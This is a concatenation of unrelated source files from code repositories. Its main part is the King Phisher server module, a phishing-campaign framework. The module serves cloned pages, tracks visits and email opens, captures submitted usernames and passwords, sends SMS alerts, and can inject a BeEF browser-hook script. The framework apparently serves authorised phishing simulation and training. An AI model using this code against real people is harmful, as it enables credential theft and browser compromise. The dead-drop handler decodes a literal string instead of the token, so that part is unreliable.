hpSvf = IirFilter(sampleFreqHz=sampleRate,numCoeffs=np.array([1,-2,1]),denomCoeffs=np.array([1+f**2, f*q-2,1-f*q]))
data = hpSvf.filterData(rawdata)
#data = scipy.signal.lfilter(filter,1,rawdata)
nSigmaTrig = 6.
deadtime = 10.
trigDict = {}
for filterType,dataKey in zip(filterTypes,filteredDataKeys):
print filterType
if filterType == 'unity':
trigDict[filterType] = velocityTrigger(filteredDict[dataKey].real,deadtime=deadtime,bNegativePulses=False,nSigmaTrig=11.)
elif filterType == 'matched' or filterType == 'super matched':
trigDict[filterType] = detectPulses(filteredDict[dataKey].real,deadtime=deadtime,nSigmaThreshold=5.,bNegativePulses=False,negDerivLenience=3)
else:
trigDict[filterType] = detectPulses(filteredDict[dataKey].real,deadtime=deadtime,nSigmaThreshold=5.,bNegativePulses=False)
print '{}: {} peaks detected'.format(filterType,len(trigDict[filterType]['peakIndices']))
nBins = 300
bPlotPeakHist = True
if bPlotPeakHist:
figHist,axHist = plt.subplots(1,1)
for filterType,filterColor in zip(filterTypes,filterColors):
peakHist,peakHistBins = np.histogram(trigDict[filterType]['peakHeights'],bins=nBins,density=True)
axHist.plot(peakHistBins[0:-1],peakHist,color=filterColor,label=filterType)
axHist.legend(loc='best')
print 'saving'
np.savez('/Scratch/dataProcessing/filterTests/filteredTriggers{}_{}_r{}p{}_{}.npz'.format(subBaseLabel,date,roachNum,pixelNum,label),
unityIndices=trigDict['unity']['peakIndices'],
unityPeaks=trigDict['unity']['peakHeights'],
templateIndices=trigDict['template']['peakIndices'],
templatePeaks=trigDict['template']['peakHeights'],
matchedIndices=trigDict['matched']['peakIndices'],
matchedPeaks=trigDict['matched']['peakHeights'],
superMatchedIndices=trigDict['super matched']['peakIndices'],
superMatchedPeaks=trigDict['super matched']['peakHeights'],
wienerIndices=trigDict['wiener']['peakIndices'],
wienerPeaks=trigDict['wiener']['peakHeights'])
bPlotPeaks = True
if bPlotPeaks:
fig,ax = plt.subplots(1,1)
endIdx = 100000
for (filterType,dataKey),filterColor in zip(zip(filterTypes,filteredDataKeys),filterColors):
ax.plot(filteredDict[dataKey][0:endIdx],'.-',color=filterColor,label=filterType)
endPeakIdx = np.searchsorted(trigDict[filterType]['peakIndices'],endIdx)
ax.plot(trigDict[filterType]['peakIndices'][0:endPeakIdx],trigDict[filterType]['peakHeights'][0:endPeakIdx],'gd')
ax.set_xlabel('time (us)')
ax.set_ylabel('phase (${}^{\circ}$)')
#ax.set_xlim([5000,15000])
ax.legend(loc='best')
#ax.set_title('detected peaks and baseline for ~%d cps, pixel /r%d/p%d'%(cps,roachNum,pixelNum))
#ax.legend(loc='lower right')
plt.show()
|
bmazin/SDR
|
Projects/SuperMatchedFilters/photonTriggers.py
|
Python
|
gpl-2.0
| 9,211
|
[
"Gaussian"
] |
47e72fd6c99f826238a1b7add2597359c9ae91caa32ea7ec779073cc4b6bbf9e
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# king_phisher/server/server.py
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of the project nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
import base64
import binascii
import ipaddress
import json
import logging
import os
import shutil
import socket
import threading
from king_phisher import errors
from king_phisher import find
from king_phisher import geoip
from king_phisher import sms
from king_phisher import templates
from king_phisher import utilities
from king_phisher import xor
from king_phisher.server import authenticator
from king_phisher.server import pages
from king_phisher.server import rest_api
from king_phisher.server import server_rpc
from king_phisher.server.database import manager as db_manager
from king_phisher.server.database import models as db_models
from king_phisher.third_party.AdvancedHTTPServer import *
import jinja2
from smoke_zephyr import job
make_uid = lambda: utilities.random_string(24)
def build_king_phisher_server(config, ServerClass=None, HandlerClass=None):
"""
Build a server from a provided configuration instance. If *ServerClass* or
*HandlerClass* is specified, then the object must inherit from the
corresponding KingPhisherServer base class.
:param config: Configuration to retrieve settings from.
:type config: :py:class:`smoke_zephyr.configuration.Configuration`
:param ServerClass: Alternative server class to use.
:type ServerClass: :py:class:`.KingPhisherServer`
:param HandlerClass: Alternative handler class to use.
:type HandlerClass: :py:class:`.KingPhisherRequestHandler`
:return: A configured server instance.
:rtype: :py:class:`.KingPhisherServer`
"""
logger = logging.getLogger('KingPhisher.Server.build')
ServerClass = (ServerClass or KingPhisherServer)
HandlerClass = (HandlerClass or KingPhisherRequestHandler)
# set config defaults
if not config.has_option('server.secret_id'):
config.set('server.secret_id', make_uid())
address = (config.get('server.address.host'), config.get('server.address.port'))
ssl_certfile = None
ssl_keyfile = None
if config.has_option('server.ssl_cert'):
ssl_certfile = config.get('server.ssl_cert')
ssl_keyfile = config.get_if_exists('server.ssl_key')
try:
server = ServerClass(config, HandlerClass, address=address, ssl_certfile=ssl_certfile, ssl_keyfile=ssl_keyfile)
except socket.error as error:
error_number, error_message = error.args
if error_number == 98:
logger.critical("failed to bind server to address {0}:{1} (socket error #98)".format(*address))
raise errors.KingPhisherError("socket error #{0} ({1})".format((error_number or 'NOT-SET'), error_message))
if config.has_option('server.server_header'):
server.server_version = config.get('server.server_header')
if not config.get_if_exists('server.rest_api.token'):
config.set('server.rest_api.token', rest_api.generate_token())
if config.get('server.rest_api.enabled'):
logger.info('rest api initialized with token: ' + config.get('server.rest_api.token'))
return server
class KingPhisherRequestHandler(server_rpc.KingPhisherRequestHandlerRPC, AdvancedHTTPServerRequestHandler):
def __init__(self, *args, **kwargs):
# this is for attribute documentation
self.config = None
"""A reference to the main server instance :py:attr:`.KingPhisherServer.config`."""
self.path = None
"""The resource path of the current HTTP request."""
super(KingPhisherRequestHandler, self).__init__(*args, **kwargs)
def install_handlers(self):
self.logger = logging.getLogger('KingPhisher.Server.RequestHandler')
super(KingPhisherRequestHandler, self).install_handlers()
self.config = self.server.config
regex_prefix = '^'
if self.config.get('server.vhost_directories'):
regex_prefix += '[\w\.\-]+\/'
for path, handler in self.handler_map.items():
if path.startswith(rest_api.REST_API_BASE):
del self.handler_map[path]
self.handler_map[regex_prefix + path] = handler
self.handler_map[regex_prefix + 'kpdd$'] = self.handle_deaddrop_visit
self.handler_map[regex_prefix + 'kp\\.js$'] = self.handle_javascript_hook
tracking_image = self.config.get('server.tracking_image')
tracking_image = tracking_image.replace('.', '\\.')
self.handler_map[regex_prefix + tracking_image + '$'] = self.handle_email_opened
def issue_alert(self, alert_text, campaign_id):
"""
Send an SMS alert. If no *campaign_id* is specified all users
with registered SMS information will receive the alert otherwise
only users subscribed to the campaign specified.
:param str alert_text: The message to send to subscribers.
:param int campaign_id: The campaign subscribers to send the alert to.
"""
session = db_manager.Session()
campaign = db_manager.get_row_by_id(session, db_models.Campaign, campaign_id)
if '{campaign_name}' in alert_text:
alert_text = alert_text.format(campaign_name=campaign.name)
for subscription in campaign.alert_subscriptions:
user = subscription.user
carrier = user.phone_carrier
number = user.phone_number
if carrier == None or number == None:
self.server.logger.warning("skipping alert because user {0} has missing information".format(user.id))
continue
self.server.logger.debug("sending alert SMS message to {0} ({1})".format(number, carrier))
sms.send_sms(alert_text, number, carrier, 'donotreply@kingphisher.local')
session.close()
def adjust_path(self):
"""Adjust the :py:attr:`~.KingPhisherRequestHandler.path` attribute based on multiple factors."""
self.request_path = self.path.split('?', 1)[0]
if not self.config.get('server.vhost_directories'):
return
if not self.vhost:
raise errors.KingPhisherAbortRequestError()
if self.vhost in ['localhost', '127.0.0.1'] and self.client_address[0] != '127.0.0.1':
raise errors.KingPhisherAbortRequestError()
self.path = '/' + self.vhost + self.path
def _do_http_method(self, *args, **kwargs):
if self.command != 'RPC':
self.adjust_path()
http_method_handler = getattr(super(KingPhisherRequestHandler, self), 'do_' + self.command)
self.server.throttle_semaphore.acquire()
try:
http_method_handler(*args, **kwargs)
except errors.KingPhisherAbortRequestError as error:
if not error.response_sent:
self.respond_not_found()
finally:
self.server.throttle_semaphore.release()
do_GET = _do_http_method
do_HEAD = _do_http_method
do_POST = _do_http_method
do_RPC = _do_http_method
def get_template_vars_client(self):
"""
Build a dictionary of variables for a client with an associated
campaign.
:return: The client specific template variables.
:rtype: dict
"""
client_vars = {
'address': self.get_client_ip()
}
if not self.message_id:
return client_vars
visit_count = 0
result = None
if self.message_id == self.config.get('server.secret_id'):
result = ['aliddle@wonderland.com', 'Wonderland Inc.', 'Alice', 'Liddle', 0]
elif self.message_id:
session = db_manager.Session()
message = db_manager.get_row_by_id(session, db_models.Message, self.message_id)
if message:
visit_count = len(message.visits)
result = [message.target_email, message.company_name, message.first_name, message.last_name, message.trained]
session.close()
if not result:
return client_vars
client_vars['email_address'] = result[0]
client_vars['company_name'] = result[1]
client_vars['first_name'] = result[2]
client_vars['last_name'] = result[3]
client_vars['is_trained'] = result[4]
client_vars['message_id'] = self.message_id
client_vars['visit_count'] = visit_count
if self.visit_id:
client_vars['visit_id'] = self.visit_id
else:
# if the visit_id is not set then this is a new visit so increment the count preemptively
client_vars['visit_count'] += 1
return client_vars
def custom_authentication(self, username, password):
return self.server.forked_authenticator.authenticate(username, password)
def check_authorization(self):
# don't require authentication for non-RPC requests
if self.command != 'RPC':
return True
if ipaddress.ip_address(self.client_address[0]).is_loopback:
return super(KingPhisherRequestHandler, self).check_authorization()
return False
@property
def campaign_id(self):
"""
The campaign id that is associated with the current request's
visitor. This is retrieved by looking up the
:py:attr:`~.KingPhisherRequestHandler.message_id` value in the
database. If no campaign is associated, this value is None.
"""
if hasattr(self, '_campaign_id'):
return self._campaign_id
self._campaign_id = None
if self.message_id and self.message_id != self.config.get('server.secret_id'):
session = db_manager.Session()
message = db_manager.get_row_by_id(session, db_models.Message, self.message_id)
if message:
self._campaign_id = message.campaign_id
session.close()
return self._campaign_id
@property
def message_id(self):
"""
The message id that is associated with the current request's
visitor. This is retrieved by looking at an 'id' parameter in the
query and then by checking the
:py:attr:`~.KingPhisherRequestHandler.visit_id` value in the
database. If no message id is associated, this value is None. The
resulting value will be either a confirmed valid value, or the value
of the configurations server.secret_id for testing purposes.
"""
if hasattr(self, '_message_id'):
return self._message_id
self._message_id = None
msg_id = self.get_query('id')
if msg_id == self.config.get('server.secret_id'):
self._message_id = msg_id
return self._message_id
session = db_manager.Session()
if msg_id and db_manager.get_row_by_id(session, db_models.Message, msg_id):
self._message_id = msg_id
elif self.visit_id:
visit = db_manager.get_row_by_id(session, db_models.Visit, self.visit_id)
self._message_id = visit.message_id
session.close()
return self._message_id
@property
def visit_id(self):
"""
The visit id that is associated with the current request's
visitor. This is retrieved by looking for the King Phisher cookie.
If no cookie is set, this value is None.
"""
if hasattr(self, '_visit_id'):
return self._visit_id
self._visit_id = None
kp_cookie_name = self.config.get('server.cookie_name')
if kp_cookie_name in self.cookies:
value = self.cookies[kp_cookie_name].value
session = db_manager.Session()
if db_manager.get_row_by_id(session, db_models.Visit, value):
self._visit_id = value
session.close()
return self._visit_id
@property
def vhost(self):
"""The value of the Host HTTP header."""
return self.headers.get('host', '').split(':')[0]
def get_client_ip(self):
"""
Intelligently get the IP address of the HTTP client, optionally
accounting for proxies that may be in use.
:return: The clients IP address
:rtype: str
"""
address = self.client_address[0]
cookie_name = self.config.get_if_exists('server.client_ip_cookie')
if not cookie_name:
return address
cookie_value = self.headers.get(cookie_name, '')
if not cookie_value:
return address
if cookie_value.startswith('['):
# cookie_value looks like an IPv6 address
cookie_value = cookie_value.split(']:', 1)[0]
else:
# treat cookie_value ad an IPv4 address
cookie_value = cookie_value.split(':', 1)[0]
if utilities.is_valid_ip_address(cookie_value):
address = cookie_value
return address
def respond_file(self, file_path, attachment=False, query={}):
self._respond_file_check_id()
file_path = os.path.abspath(file_path)
mime_type = self.guess_mime_type(file_path)
if attachment or (mime_type != 'text/html' and mime_type != 'text/plain'):
self._respond_file_raw(file_path, attachment)
return
try:
template = self.server.template_env.get_template(os.path.relpath(file_path, self.server.serve_files_root))
except jinja2.exceptions.TemplateSyntaxError as error:
self.server.logger.error("jinja2 syntax error in template {0}:{1} {2}".format(error.filename, error.lineno, error.message))
raise errors.KingPhisherAbortRequestError()
except jinja2.exceptions.TemplateError:
raise errors.KingPhisherAbortRequestError()
template_vars = {
'client': self.get_template_vars_client(),
'request': {
'command': self.command,
'cookies': dict((c[0], c[1].value) for c in self.cookies.items()),
'parameters': dict(zip(self.query_data.keys(), map(self.get_query, self.query_data.keys()))),
'user_agent': self.headers.get('user-agent')
},
'server': {
'hostname': self.vhost,
'address': self.connection.getsockname()[0]
}
}
template_vars.update(self.server.template_env.standard_variables)
try:
template_data = template.render(template_vars)
except (TypeError, jinja2.TemplateError) as error:
self.server.logger.error("jinja2 template {0} render failed: {1} {2}".format(template.filename, error.__class__.__name__, error.message))
raise errors.KingPhisherAbortRequestError()
fs = os.stat(template.filename)
if mime_type.startswith('text'):
mime_type = mime_type + '; charset=utf-8'
self.send_response(200)
self.send_header('Content-Type', mime_type)
self.send_header('Content-Length', str(len(template_data)))
self.send_header('Last-Modified', self.date_time_string(fs.st_mtime))
try:
self.handle_page_visit()
except Exception as error:
self.server.logger.error('handle_page_visit raised error: {0}.{1}'.format(error.__class__.__module__, error.__class__.__name__), exc_info=True)
self.end_headers()
self.wfile.write(template_data.encode('utf-8', 'ignore'))
return
def _respond_file_raw(self, file_path, attachment):
try:
file_obj = open(file_path, 'rb')
except IOError:
raise errors.KingPhisherAbortRequestError()
fs = os.fstat(file_obj.fileno())
self.send_response(200)
self.send_header('Content-Type', self.guess_mime_type(file_path))
self.send_header('Content-Length', str(fs[6]))
if attachment:
file_name = os.path.basename(file_path)
self.send_header('Content-Disposition', 'attachment; filename=' + file_name)
self.send_header('Last-Modified', self.date_time_string(fs.st_mtime))
self.end_headers()
shutil.copyfileobj(file_obj, self.wfile)
file_obj.close()
return
def _respond_file_check_id(self):
if not self.config.get('server.require_id'):
return
if self.message_id == self.config.get('server.secret_id'):
return
# a valid campaign_id requires a valid message_id
if not self.campaign_id:
self.server.logger.warning('denying request due to lack of a valid id')
raise errors.KingPhisherAbortRequestError()
session = db_manager.Session()
campaign = db_manager.get_row_by_id(session, db_models.Campaign, self.campaign_id)
query = session.query(db_models.LandingPage)
query = query.filter_by(campaign_id=self.campaign_id, hostname=self.vhost)
if query.count() == 0:
self.server.logger.warning('denying request with not found due to invalid hostname')
session.close()
raise errors.KingPhisherAbortRequestError()
if campaign.reject_after_credentials and self.visit_id == None:
query = session.query(db_models.Credential)
query = query.filter_by(message_id=self.message_id)
if query.count():
self.server.logger.warning('denying request because credentials were already harvested')
session.close()
raise errors.KingPhisherAbortRequestError()
session.close()
return
def respond_not_found(self):
self.send_response(404, 'Resource Not Found')
self.send_header('Content-Type', 'text/html')
self.end_headers()
page_404 = find.find_data_file('error_404.html')
if page_404:
with open(page_404, 'rb') as page_404:
shutil.copyfileobj(page_404, self.wfile)
else:
self.wfile.write('Resource Not Found\n')
return
def respond_redirect(self, location='/'):
location = location.lstrip('/')
if self.config.get('server.vhost_directories') and location.startswith(self.vhost):
location = location[len(self.vhost):]
if not location.startswith('/'):
location = '/' + location
super(KingPhisherRequestHandler, self).respond_redirect(location)
def handle_deaddrop_visit(self, query):
self.send_response(200)
self.end_headers()
data = self.get_query('token')
if not data:
self.logger.warning('dead drop request received with no \'token\' parameter')
return
try:
data = base64.b64decode('base64')
except binascii.Error:
self.logger.error('dead drop request received with invalid \'token\' data')
return
data = xor.xor_decode(data)
try:
data = json.loads(data)
except ValueError:
self.logger.error('dead drop request received with invalid \'token\' data')
return
session = db_manager.Session()
deployment = db_manager.get_row_by_id(session, db_models.DeaddropDeployment, data.get('deaddrop_id'))
if not deployment:
session.close()
self.logger.error('dead drop request received for an unknown campaign')
return
local_username = data.get('local_username')
local_hostname = data.get('local_hostname')
if local_username == None or local_hostname == None:
session.close()
self.logger.error('dead drop request received with missing data')
return
local_ip_addresses = data.get('local_ip_addresses')
if isinstance(local_ip_addresses, (list, tuple)):
local_ip_addresses = ' '.join(local_ip_addresses)
query = session.query(db_models.DeaddropConnection)
query = query.filter_by(id=deployment.id, local_username=local_username, local_hostname=local_hostname)
connection = query.first()
if connection:
connection.visit_count += 1
else:
connection = db_models.Connection(campaign_id=deployment.campaign_id, deployment_id=deployment.id)
connection.visitor_ip = self.client_address
connection.local_username = local_username
connection.local_hostname = local_hostname
connection.local_ip_addresses = local_ip_addresses
session.add(connection)
session.commit()
query = session.query(db_models.DeaddropConnection)
query = query.filter_by(campaign_id=deployment.campaign_id)
visit_count = query.count()
session.close()
if visit_count > 0 and ((visit_count in [1, 3, 5]) or ((visit_count % 10) == 0)):
alert_text = "{0} deaddrop connections reached for campaign: {{campaign_name}}".format(visit_count)
self.server.job_manager.job_run(self.issue_alert, (alert_text, campaign_id))
return
def handle_email_opened(self, query):
# image size: 43 Bytes
img_data = '47494638396101000100800100000000ffffff21f90401000001002c00000000'
img_data += '010001000002024c01003b'
img_data = binascii.a2b_hex(img_data)
self.send_response(200)
self.send_header('Content-Type', 'image/gif')
self.send_header('Content-Length', str(len(img_data)))
self.end_headers()
self.wfile.write(img_data)
msg_id = self.get_query('id')
if not msg_id:
return
session = db_manager.Session()
query = session.query(db_models.Message)
query = query.filter_by(id=msg_id, opened=None)
message = query.first()
if message:
message.opened = db_models.current_timestamp()
session.commit()
session.close()
def handle_javascript_hook(self, query):
kp_hook_js = find.find_data_file('javascript_hook.js')
if not kp_hook_js:
self.respond_not_found()
return
with open(kp_hook_js, 'r') as kp_hook_js:
javascript = kp_hook_js.read()
if self.config.has_option('beef.hook_url'):
javascript += "\nloadScript('{0}');\n\n".format(self.config.get('beef.hook_url'))
self.send_response(200)
self.send_header('Content-Type', 'text/javascript')
self.send_header('Pragma', 'no-cache')
self.send_header('Cache-Control', 'no-cache')
self.send_header('Expires', '0')
self.send_header('Access-Control-Allow-Origin', '*')
self.send_header('Access-Control-Allow-Methods', 'POST, GET')
self.send_header('Content-Length', str(len(javascript)))
self.end_headers()
if not isinstance(javascript, bytes):
javascript = javascript.encode('utf-8')
self.wfile.write(javascript)
return
def handle_page_visit(self):
if not self.message_id:
return
if self.message_id == self.config.get('server.secret_id'):
return
if not self.campaign_id:
return
client_ip = self.get_client_ip()
self.logger.info("handling a page visit for campaign id: {0} from IP address: {1}".format(self.campaign_id, client_ip))
session = db_manager.Session()
campaign = db_manager.get_row_by_id(session, db_models.Campaign, self.campaign_id)
message = db_manager.get_row_by_id(session, db_models.Message, self.message_id)
if message.opened == None and self.config.get_if_exists('server.set_message_opened_on_visit', True):
message.opened = db_models.current_timestamp()
set_new_visit = True
visit_id = make_uid()
if self.visit_id:
set_new_visit = False
visit_id = self.visit_id
query = session.query(db_models.LandingPage)
query = query.filter_by(campaign_id=self.campaign_id, hostname=self.vhost, page=self.request_path[1:])
if query.count():
visit = db_manager.get_row_by_id(session, db_models.Visit, visit_id)
if visit.message_id == self.message_id:
visit.visit_count += 1
else:
set_new_visit = True
if set_new_visit:
kp_cookie_name = self.config.get('server.cookie_name')
cookie = "{0}={1}; Path=/; HttpOnly".format(kp_cookie_name, visit_id)
self.send_header('Set-Cookie', cookie)
visit = db_models.Visit(id=visit_id, campaign_id=self.campaign_id, message_id=self.message_id)
visit.visitor_ip = client_ip
visit.visitor_details = self.headers.get('user-agent', '')
session.add(visit)
visit_count = len(campaign.visits)
if visit_count > 0 and ((visit_count in [1, 10, 25]) or ((visit_count % 50) == 0)):
alert_text = "{0} visits reached for campaign: {{campaign_name}}".format(visit_count)
self.server.job_manager.job_run(self.issue_alert, (alert_text, self.campaign_id))
self._handle_page_visit_creds(session, visit_id)
trained = self.get_query('trained')
if isinstance(trained, str) and trained.lower() in ['1', 'true', 'yes']:
message.trained = True
session.commit()
session.close()
def _handle_page_visit_creds(self, session, visit_id):
username = None
for pname in ['username', 'user', 'u']:
username = (self.get_query(pname) or self.get_query(pname.title()) or self.get_query(pname.upper()))
if username:
break
if not username:
return
password = None
for pname in ['password', 'pass', 'p']:
password = (self.get_query(pname) or self.get_query(pname.title()) or self.get_query(pname.upper()))
if password:
break
password = (password or '')
cred_count = 0
query = session.query(db_models.Credential)
query = query.filter_by(message_id=self.message_id, username=username, password=password)
if query.count() == 0:
cred = db_models.Credential(campaign_id=self.campaign_id, message_id=self.message_id, visit_id=visit_id)
cred.username = username
cred.password = password
session.add(cred)
campaign = db_manager.get_row_by_id(session, db_models.Campaign, self.campaign_id)
cred_count = len(campaign.credentials)
if cred_count > 0 and ((cred_count in [1, 5, 10]) or ((cred_count % 25) == 0)):
alert_text = "{0} credentials submitted for campaign: {{campaign_name}}".format(cred_count)
self.server.job_manager.job_run(self.issue_alert, (alert_text, self.campaign_id))
class KingPhisherServer(AdvancedHTTPServer):
"""
The main HTTP and RPC server for King Phisher.
"""
def __init__(self, config, HandlerClass, *args, **kwargs):
"""
:param config: Configuration to retrieve settings from.
:type config: :py:class:`smoke_zephyr.configuration.Configuration`
"""
# additional mime types to be treated as html because they're probably cloned pages
HandlerClass.extensions_map.update({
'': 'text/html',
'.asp': 'text/html',
'.aspx': 'text/html',
'.cfm': 'text/html',
'.cgi': 'text/html',
'.do': 'text/html',
'.jsp': 'text/html',
'.nsf': 'text/html',
'.php': 'text/html',
'.srf': 'text/html'
})
super(KingPhisherServer, self).__init__(HandlerClass, *args, **kwargs)
self.logger = logging.getLogger('KingPhisher.Server')
self.config = config
"""A :py:class:`~smoke_zephyr.configuration.Configuration` instance used as the main King Phisher server configuration."""
self.serve_files = True
self.serve_files_root = config.get('server.web_root')
self.serve_files_list_directories = False
self.serve_robots_txt = True
self.database_engine = db_manager.init_database(config.get('server.database'))
self.http_server.config = config
self.http_server.throttle_semaphore = threading.Semaphore()
self.http_server.forked_authenticator = authenticator.ForkedAuthenticator(required_group=config.get_if_exists('server.authentication.group'))
self.logger.debug('forked an authenticating process with PID: ' + str(self.http_server.forked_authenticator.child_pid))
self.job_manager = job.JobManager()
"""A :py:class:`~smoke_zephyr.job.JobManager` instance for scheduling tasks."""
self.job_manager.start()
self.http_server.job_manager = self.job_manager
loader = jinja2.FileSystemLoader(config.get('server.web_root'))
global_vars = {}
if config.has_section('server.page_variables'):
global_vars = config.get('server.page_variables')
global_vars['embed_youtube_video'] = pages.embed_youtube_video
global_vars['make_csrf_page'] = pages.make_csrf_page
global_vars['make_redirect_page'] = pages.make_redirect_page
self.http_server.template_env = templates.BaseTemplateEnvironment(loader=loader, global_vars=global_vars)
self.__geoip_db = geoip.init_database(config.get('server.geoip.database'))
self.__is_shutdown = threading.Event()
self.__is_shutdown.clear()
def shutdown(self, *args, **kwargs):
"""
Request that the server perform any cleanup necessary and then
shut down. This will wait for the server to stop before it
returns.
"""
if self.__is_shutdown.is_set():
return
self.logger.warning('processing shutdown request')
super(KingPhisherServer, self).shutdown(*args, **kwargs)
self.http_server.forked_authenticator.stop()
self.logger.debug('stopped the forked authenticator process')
self.job_manager.stop()
self.__geoip_db.close()
self.__is_shutdown.set()
|
drptbl/king-phisher
|
king_phisher/server/server.py
|
Python
|
bsd-3-clause
| 27,595
|
[
"VisIt"
] |
4f1a55ec95719b0027f4b0484bcf2932961304c36f8f768059a8036c0daf02f0
|
"""
Use this script for setting the arguments.
(c) May 2017 by Daniel Seita
"""
import argparse
import logz
import os
import pickle
import tensorflow as tf
import utils
from es import ESAgent
if __name__ == "__main__":
""" LOTS of arguments here, but hopefully most are straightforward. Run
`python main.py -h` to visualize the help messages.
"""
parser = argparse.ArgumentParser()
parser.add_argument('envname', type=str,
help='The OpenAI gym environment name (case sensitive).')
parser.add_argument('--do_not_save', action='store_true',
help='Sets the log_dir to be None.')
parser.add_argument('--es_iters', type=int, default=100,
help='Iterations to run ES.')
parser.add_argument('--log_every_t_iter', type=int, default=1,
help='Controls the amount of time information is logged.')
parser.add_argument('--lrate_es', type=float, default=0.001,
help='Learning rate for the ES gradient update.')
parser.add_argument('--npop', type=int, default=200,
help='Weight vectors to sample for ES (INCLUDING the mirroring')
parser.add_argument('--render', action='store_true',
help='Use `--render` to visualize trajectories each iteration.')
parser.add_argument('--seed', type=int, default=0,
help='The random seed.')
parser.add_argument('--sigma', type=float, default=0.1,
help='Sigma (standard deviation) for the Gaussian noise.')
parser.add_argument('--snapshot_every_t_iter', type=int, default=100,
help='Save the model every t iterations so we can inspect later.')
parser.add_argument('--test_trajs', type=int, default=10,
help='Number of evaluation trajectories after each iteration.')
parser.add_argument('--verbose', action='store_true',
help='Use `--verbose` for a few additional debugging messages.')
args = parser.parse_args()
assert args.npop % 2 == 0 # Just to be consistent with my other code.
# Make the TensorFlow session and do some logic with handling arguments.
session = utils.get_tf_session()
log_dir = None
if not args.do_not_save:
log_dir = 'outputs/' +args.envname+ '/seed' +str(args.seed).zfill(4)
logz.configure_output_dir(log_dir)
os.makedirs(log_dir+'/snapshots/')
with open(log_dir+'/args.pkl','wb') as f:
pickle.dump(args, f)
# Build and run evolution strategies.
es_agent = ESAgent(session, args, log_dir)
es_agent.run_es()
|
DanielTakeshi/rl_algorithms
|
es/main.py
|
Python
|
mit
| 2,542
|
[
"Gaussian"
] |
8d3a32b9f7d777401f16c4b9effb8483a929f38c359298d1296fc0a3866ea40a
|
#
# Copyright (C) 2008, Brian Tanner
#
#http://rl-glue-ext.googlecode.com/
#
# Licensed under the Apache License, Version 2.0 (the "License")
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# $Revision: 617 $
# $Date: 2009-02-05 04:24:12 -0500 (Thu, 05 Feb 2009) $
# $Author: gabalz $
# $HeadURL: http://rl-glue-ext.googlecode.com/svn/trunk/projects/codecs/Python/src/tests/test_empty_experiment.py $
import sys
import rlglue.RLGlue as RLGlue
from glue_test import glue_test
tester =glue_test("test_empty")
task_spec=RLGlue.RL_init()
for whichEpisode in range(1, 5):
startTuple=RLGlue.RL_start()
if(whichEpisode%2==0):
tester.check_fail(len(startTuple.a.intArray)!=0)
tester.check_fail(len(startTuple.a.doubleArray)!=0)
tester.check_fail(len(startTuple.a.charArray)!=0)
tester.check_fail(len(startTuple.o.intArray)!=0)
tester.check_fail(len(startTuple.o.doubleArray)!=0)
tester.check_fail(len(startTuple.o.charArray)!=0)
else:
tester.check_fail(len(startTuple.a.intArray)!=7)
tester.check_fail(len(startTuple.a.doubleArray)!=3)
tester.check_fail(len(startTuple.a.charArray)!=1)
tester.check_fail(len(startTuple.o.intArray)!=2)
tester.check_fail(len(startTuple.o.doubleArray)!=4)
tester.check_fail(len(startTuple.o.charArray)!=5)
for whichStep in range(0,5):
stepTuple=RLGlue.RL_step()
tester.check_fail(stepTuple.terminal!=0)
tester.check_fail(stepTuple.r!=0)
if(whichEpisode%2==0):
tester.check_fail(len(stepTuple.a.intArray)!=0)
tester.check_fail(len(stepTuple.a.doubleArray)!=0)
tester.check_fail(len(stepTuple.a.charArray)!=0)
tester.check_fail(len(stepTuple.o.intArray)!=0)
tester.check_fail(len(stepTuple.o.doubleArray)!=0)
tester.check_fail(len(stepTuple.o.charArray)!=0)
else:
tester.check_fail(len(stepTuple.a.intArray)!=7)
tester.check_fail(len(stepTuple.a.doubleArray)!=3)
tester.check_fail(len(stepTuple.a.charArray)!=1)
tester.check_fail(len(stepTuple.o.intArray)!=2)
tester.check_fail(len(stepTuple.o.doubleArray)!=4)
tester.check_fail(len(stepTuple.o.charArray)!=5)
print tester.get_summary()
sys.exit(tester.getFailCount())
|
shiwalimohan/RLInfiniteMario
|
system/codecs/Python/src/tests/test_empty_experiment.py
|
Python
|
gpl-2.0
| 2,574
|
[
"Brian"
] |
65f0c4c84efc4d3b5140500129fbfca4a01c1c7032f57bb0e7f093917c33f111
|
# !/bin/python
# -*- coding: latin-1 -*-
# Copyright (C) 2009-2014 CEA/DEN, EDF R&D
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
